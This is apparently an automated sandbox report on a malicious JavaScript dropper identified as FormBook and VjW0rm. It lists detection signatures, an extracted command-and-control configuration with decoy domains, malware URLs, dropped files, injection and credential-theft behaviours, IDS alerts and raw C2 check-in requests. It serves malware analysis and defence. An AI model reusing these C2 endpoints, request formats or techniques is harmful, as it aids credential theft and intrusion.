Windows Analysis Report
CIQ-PO16266.js

Overview

General Information

Sample Name: CIQ-PO16266.js
Analysis ID: 635297
MD5: 3570adb415b3302811030be16c08f2ff
SHA1: 2da5d97870cfadf90ebb7890f58ee211ea112cbb
SHA256: 10087128422049e18547776f5785304fbf760279baddc0abdbf3943f66b780ff
Tags: jsVjw0rm
Infos:

Detection

FormBook, VjW0rm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected VjW0rm
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Wscript called in batch mode (surpress errors)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Maps a DLL or memory area into another process
JavaScript source code contains call to eval containing suspicious API calls
Performs DNS queries to domains with low reputation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Drops script or batch files to the startup folder
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.gafcbooster.com/np8s/"], "decoy": ["segredovideos.online", "kishanshree.com", "mjmvn.com", "44bb44.com", "brawlhallacodestore.com", "littlebeartreeservices.com", "topings33.com", "nachuejooj07.xyz", "waermark.com", "halecamilla.site", "basincreekmedia.com", "resolutionmeasles.com", "interlink-travel.com", "siberup.xyz", "getbusinesscreditandfunding.com", "shcylzc.com", "68chengxinle.com", "jkrsbarmybookarmy.com", "geo-pacificoffshore.com", "refreshertowels.com", "localbloom.online", "brandingaloha.com", "84866.xyz", "salondutaxi.com", "harmlett.com", "angelmatic.net", "o7oiwlp.xyz", "thepowerofanopenquestion.com", "tokenascent.com", "udrivestorage.com", "hengyuejiguang.com", "minotaur.network", "ratebill.com", "18w99.com", "2264a.com", "tentanguang.online", "muddybootslife.com", "vitality-patients.online", "heavymettlelawyers.com", "spxtokensales.com", "titair.com", "lazarusnatura.com", "rasheedabossmoves.com", "medyumgalip.com", "liveafunday.xyz", "xn--wsthof-camping-gsb.com", "xfd8asvtivg944.xyz", "myhvn.site", "964061.com", "screeshot.com", "mysbaally.com", "connectfamily.loan", "langlev.com", "labsreports-menalab.com", "gabefancher.com", "jdhwh2nbiw234.com", "pdwfifi.com", "losangelesrentalz.com", "brandpay.xyz", "jlbwaterdamagerepairseattle.com", "wps-mtb.com", "sekolahkejepang.com", "saastainability.com", "multiverseofbooks.com"]}
Multi AV Scanner detection for submitted file
Source: CIQ-PO16266.js Virustotal: Detection: 25% Perma Link
Source: CIQ-PO16266.js ReversingLabs: Detection: 22%
Yara detected FormBook
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.bin.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.bin.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577518053.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577466338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577252910.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.539227750.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.981077246.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000001.447624352.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1028333019.0000000004867000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.972949650.0000000000484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.891623399.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451386308.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887276277.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.515738987.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887613995.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.447905033.000001C6B609A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.982531208.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.447458593.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.959879577.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.455268485.000001C6B6770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.452309362.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.454366130.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448608329.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887927975.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED
Antivirus detection for URL or domain
Source: http://www.ratebill.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VredmFyIGN0 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrext10 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre$s Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre-Agent(( Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrebWcgPSAi Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreMw Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.duum Avira URL Cloud: Label: malware
Source: http://www.ratebill.com/np8s/?4hM4=o4B0f&zVB=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkBjakU6FhLRf Avira URL Cloud: Label: malware
Source: http://www.rasheedabossmoves.com/np8s/?4hM4=o4B0f&zVB=pvCvVC1srqMzTu3vjZ/Pi4S7puQ7WYlroZs2vwEH9SE4BkgUF4SEMyF7Qq3EYWraDKw9 Avira URL Cloud: Label: malware
Source: http://www.topings33.com/np8s/?zVB=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMINrnM1Idbq&4hM4=o4B0f Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreox Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreMpN Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrentWW Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreMs& Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre9 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre2 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreMF Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre4 Avira URL Cloud: Label: malware
Source: http://www.pdwfifi.com/np8s/?4hM4=o4B0f&zVB=xL/YlJAUY6uB/cHSlkc/r5VaZJ7uMa0kbAtysG6BLnWT6huomjvuhq3RLtT5uw3RUbD6 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreeX9 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre0 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre1 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrenter2 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/KCQlm Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrets Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreM: Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre) Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrecomputerNUMBER_OF_H Avira URL Cloud: Label: malware
Source: http://www.jlbwaterdamagerepairseattle.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreHGG Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreoX&B Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrenter2Pac Avira URL Cloud: Label: malware
Source: http://www.brawlhallacodestore.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre~ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZXBsYWNl Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-1000 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreKTsNClZO Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrew Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vret Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreo Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrep Avira URL Cloud: Label: malware
Source: www.gafcbooster.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrel Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrei Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreXGxvY2Fs Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.d Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-100 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreITL Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreR Avira URL Cloud: Label: malware
Source: http://www.pdwfifi.com/np8s/ Avira URL Cloud: Label: malware
Source: http://www.jlbwaterdamagerepairseattle.com/np8s/?4hM4=o4B0f&zVB=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo1SUrSQk5nZl Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreM Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre-Agent((m Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreG Avira URL Cloud: Label: malware
Source: http://www.topings33.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrenter22 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrePSAiQ2wi Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre0D Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrr Avira URL Cloud: Label: malware
Source: http://www.muddybootslife.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrrm Avira URL Cloud: Label: malware
Source: http://www.brawlhallacodestore.com/np8s/?zVB=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgMzU3Pebjd8T&4hM4=o4B0f Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrer: Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.duu Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreoft.XMLHTTPll Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreG1C Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: rasheedabossmoves.com Virustotal: Detection: 7% Perma Link
Antivirus detection for dropped file
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\bin.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Metadefender: Detection: 48% Perma Link
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\Clf0t8l5h\oxx7nkdv4g8.exe Metadefender: Detection: 48% Perma Link
Source: C:\Users\user\AppData\Local\Temp\Clf0t8l5h\oxx7nkdv4g8.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\bin.exe Metadefender: Detection: 48% Perma Link
Source: C:\Users\user\AppData\Local\Temp\bin.exe ReversingLabs: Detection: 100%
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bin.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.bin.exe.10000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.bin.exe.10000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: Binary string: wntdll.pdbUGP source: bin.exe, 00000003.00000003.451270316.0000000000BE1000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000003.448147583.0000000000A4C000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000002.577803600.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000002.578046255.0000000000E9F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.991201290.0000000004330000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.579500120.0000000000D4E000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.991328782.000000000444F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.577535038.0000000000BAF000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000002.891799619.0000000001030000.00000040.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000003.890212003.0000000000E92000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000003.888712665.0000000000BD9000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000002.892187528.000000000114F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bin.exe, bin.exe, 00000003.00000003.451270316.0000000000BE1000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000003.448147583.0000000000A4C000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000002.577803600.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000002.578046255.0000000000E9F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000D.00000002.991201290.0000000004330000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.579500120.0000000000D4E000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.991328782.000000000444F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.577535038.0000000000BAF000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, oxx7nkdv4g8.exe, 00000017.00000002.891799619.0000000001030000.00000040.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000003.890212003.0000000000E92000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000003.888712665.0000000000BD9000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000002.892187528.000000000114F000.00000040.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00411660 FindFirstFileW,FindNextFileW,FindClose, 13_2_00411660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00411659 FindFirstFileW,FindNextFileW,FindClose, 13_2_00411659
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior

Software Vulnerabilities
barindex
JavaScript source code contains functionality to generate code involving a shell, file or stream
Source: CIQ-PO16266.js Argument value : ['"gYMty=WSH.CreateObject("adodb.stream")"', '"gYMty=","WSH.CreateObject("adodb.stream")",-386'] Go to definition
Source: CIQ-PO16266.js Argument value : ['"gYMty=WSH.CreateObject("adodb.stream")"', 'gYMty,WSH.CreateObject("adodb.stream")', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty=","WSH.CreateObject("adodb.stream")",-386', '"gYMty","WSH.CreateObject("adodb.stream")"'] Go to definition
Source: CIQ-PO16266.js Argument value : ['"gYMty=WSH.CreateObject("adodb.stream")"', 'gYMty,WSH.CreateObject("adodb.stream")', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty=","WSH.CreateObject("adodb.stream")",-386', '"gYMty","WSH.CreateObject("adodb.stream")"'] Go to definition
JavaScript source code contains call to eval containing suspicious API calls
Source: CIQ-PO16266.js Argument value: ['"gYMty=WSH.CreateObject("adodb.stream")"', '"var H3br3w=WSH.CreateObject("microsoft.xmldom").createElement("mko")"'] Go to definition

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.ratebill.com
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.muddybootslife.com
Source: C:\Windows\explorer.exe Domain query: www.topings33.com
Source: C:\Windows\explorer.exe Network Connect: 185.53.179.171 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.localbloom.online
Source: C:\Windows\explorer.exe Domain query: www.pdwfifi.com
Source: C:\Windows\explorer.exe Domain query: www.rasheedabossmoves.com
Source: C:\Windows\explorer.exe Network Connect: 23.231.99.207 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.68chengxinle.com
Source: C:\Windows\explorer.exe Domain query: www.84866.xyz
Source: C:\Windows\explorer.exe Domain query: www.halecamilla.site
Source: C:\Windows\explorer.exe Network Connect: 137.220.133.198 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.39.111.146 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 35.241.47.216 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 170.39.76.27 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.medyumgalip.com
Source: C:\Windows\explorer.exe Domain query: www.wps-mtb.com
Source: C:\Windows\System32\wscript.exe Domain query: dilshadkhan.duia.ro
Source: C:\Windows\explorer.exe Domain query: www.refreshertowels.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.230.89 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 207.174.214.35 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 66.235.200.145 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.jlbwaterdamagerepairseattle.com
Source: C:\Windows\explorer.exe Domain query: www.sekolahkejepang.com
Source: C:\Windows\explorer.exe Network Connect: 52.17.85.125 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.brawlhallacodestore.com
Source: C:\Windows\explorer.exe Domain query: www.hengyuejiguang.com
Source: C:\Windows\explorer.exe Network Connect: 185.134.245.113 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.247.11.212 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Network Connect: 91.193.75.133 6670 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.gafcbooster.com
Source: C:\Windows\explorer.exe Network Connect: 172.67.140.71 80 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49830 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49830 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49830 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49848 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49848 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49848 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49892 -> 170.39.76.27:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49892 -> 170.39.76.27:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49892 -> 170.39.76.27:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49913 -> 185.53.179.171:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49913 -> 185.53.179.171:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49913 -> 185.53.179.171:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49920 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49920 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49920 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49940 -> 134.122.201.217:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49940 -> 134.122.201.217:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49940 -> 134.122.201.217:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49964 -> 170.39.76.27:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49964 -> 170.39.76.27:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49964 -> 170.39.76.27:80
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.84866.xyz
Source: DNS query: www.o7oiwlp.xyz
Source: DNS query: www.84866.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.gafcbooster.com/np8s/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY
Source: Joe Sandbox View ASN Name: GODADDY-AMSDE GODADDY-AMSDE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=pvCvVC1srqMzTu3vjZ/Pi4S7puQ7WYlroZs2vwEH9SE4BkgUF4SEMyF7Qq3EYWraDKw9 HTTP/1.1Host: www.rasheedabossmoves.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=LP9EI17xKnNeim8nLd+KxbxmCUjQ+ejx+5/wYAWzXpI6ry2rccLFMoZPirUOcSWhDiha&4hM4=o4B0f HTTP/1.1Host: www.84866.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=VOk/KoOKPmyFTHQXWsNAO627WiKHMN6hKQrMVwJFQe1euvxAvAuscpxAvIMnAXbQu1P/ HTTP/1.1Host: www.sekolahkejepang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=MO+mSdLLrNuwRQYoVJuGLv0I5Vniy3FD6QWfbcj4un1GXTVLdefusF8/o4IGo+fIW5Ou&4hM4=o4B0f HTTP/1.1Host: www.refreshertowels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=vppS5AedQQffRlEeclZ7feN7VEirdPdpHk1lk+jbM2J+jzoAXquLk4CVs1G32f+Ix1mc&4hM4=o4B0f HTTP/1.1Host: www.medyumgalip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
